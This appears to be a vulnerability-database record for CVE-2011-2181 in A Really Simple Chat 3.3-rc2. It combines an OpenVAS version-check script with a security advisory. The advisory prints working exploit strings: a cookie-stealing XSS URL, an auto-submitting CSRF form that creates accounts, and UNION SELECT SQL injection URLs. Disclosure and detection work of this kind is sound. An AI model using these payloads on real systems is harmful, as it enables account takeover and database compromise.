ID CVE-2011-2181 Type cve Reporter cve@mitre.org Modified 2011-06-30T04:00:00
Description
Multiple SQL injection vulnerabilities in A Really Simple Chat (ARSC) 3.3-rc2 allow remote attackers to execute arbitrary SQL commands via the (1) arsc_user parameter to base/admin/edit_user.php, (2) arsc_layout_id parameter in base/admin/edit_layout.php, or (3) arsc_room parameter to base/admin/edit_room.php.
{"openvas": [{"lastseen": "2020-05-08T19:10:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2181"], "description": "The host is running A Really Simple Chat and is prone to multiple\n SQL injection vulnerabilities.", "modified": "2020-05-06T00:00:00", "published": "2011-07-05T00:00:00", "id": "OPENVAS:1361412562310902608", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902608", "type": "openvas", "title": "A Really Simple Chat Multiple SQL Injection Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# A Really Simple Chat Multiple SQL Injection Vulnerabilities\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902608\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:14:18 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-07-05 13:15:06 +0200 (Tue, 05 Jul 2011)\");\n script_cve_id(\"CVE-2011-2181\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"A Really Simple Chat Multiple SQL Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2011/06/02/7\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2011/06/02/1\");\n script_xref(name:\"URL\", value:\"http://www.htbridge.ch/advisory/multiple_sql_injections_in_a_really_simple_chat_arsc.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to alter queries to\n the SQL database, execute arbitrary queries to the database, compromise the\n application, access or modify sensitive data.\");\n\n script_tag(name:\"affected\", value:\"A Really Simple Chat version 3.3-rc2.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to improper validation of user supplied data\n to 'arsc_user parameter' in edit_user.php, 'arsc_layout_id' parameter in\n edit_layout.php and 'arsc_room' parameter in edit_room.php, which allows\n attacker to execute arbitrary SQL commands.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is running A Really Simple Chat and is prone to multiple\n SQL injection vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\n\nif(!http_can_host_php(port:port)){\n exit(0);\n}\n\nforeach dir (make_list_unique(\"/arsc\", \"/chat\", \"/\", http_cgi_dirs(port:port)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n res = http_get_cache(item:dir + \"/base/index.php\", port:port);\n if(\"Powered by ARSC\" >< res && \"v3.3-rc2\" >< res)\n {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "htbridge": [{"lastseen": "2020-12-24T11:32:23", "bulletinFamily": "software", "cvelist": ["CVE-2011-2180", "CVE-2011-2181"], "description": "High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in A Really Simple Chat (ARSC) which could be exploited to perform cross-site scripting, cross-site request forgery and SQL injection attacks. \n \n1) Cross-site scripting (XSS) vulnerability in A Really Simple Chat (ARSC): CVE-2011-2180 \n1.1 The vulnerability exists due to input sanitation error in the \"arsc_link\" parameter in dereferer.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. \nExploitation example: \nhttp://[host]/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28documen t.cookie%29;%3C/script%3 E \n \n2) Cross-site request forgery (CSRF) vulnerabilities in A Really Simple Chat (ARSC) \n2.1 The vulnerability exists due to insufficient validation of the request origin in base/admin/add_user.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create arbitrary accounts. \nExploitation example: \n<form action=\"http://[host]/base/admin/add_user.php\" method=\"post\" name=\"main\" /> \n<input name=\"arsc_newuser\" value=\"test\" type=\"hidden\" /> \n<input type=\"submit\" id=\"btn\" name=\"submit\" value=\"Submit \u203a\u203a\"> \n</form> \n<script> \ndocument.getElementById('btn').click(); \n</scri pt> \n \n3) SQL injection weakness in A Really Simple Chat (ARSC): CVE-2011-2181 \nThe weakness exists due to input sanitation errors in the \"user\" parameter in base/admin/edit_user.php, in the \"arsc_layout_id\" in base/admin/edit_layout.php and in the \"arsc_room\" parameter in base/admin/edit_room.php. A remote user with administrative privileges can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Combined with vulnerability #2 it is possible for a remote attacker to create an administrative account and then use it to exploit this weakness. \nExploitation examples: \nhttp://[host]/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201, version%28%29,3,4,5,6,7, 8,9,10,11,12,13,14,15%20--%202 \nhttp://[host]/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select% 201,version%28%29,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 \nhttp://[host]/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2, version%28%29,4,5,6,7%20 --%202 \n\n", "modified": "2011-05-12T00:00:00", "published": "2011-05-12T00:00:00", "id": "HTB22997", "href": "https://www.htbridge.com/advisory/HTB22997", "type": "htbridge", "title": "Multiple Vulnerabilities in A Really Simple Chat (ARSC)", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}]}
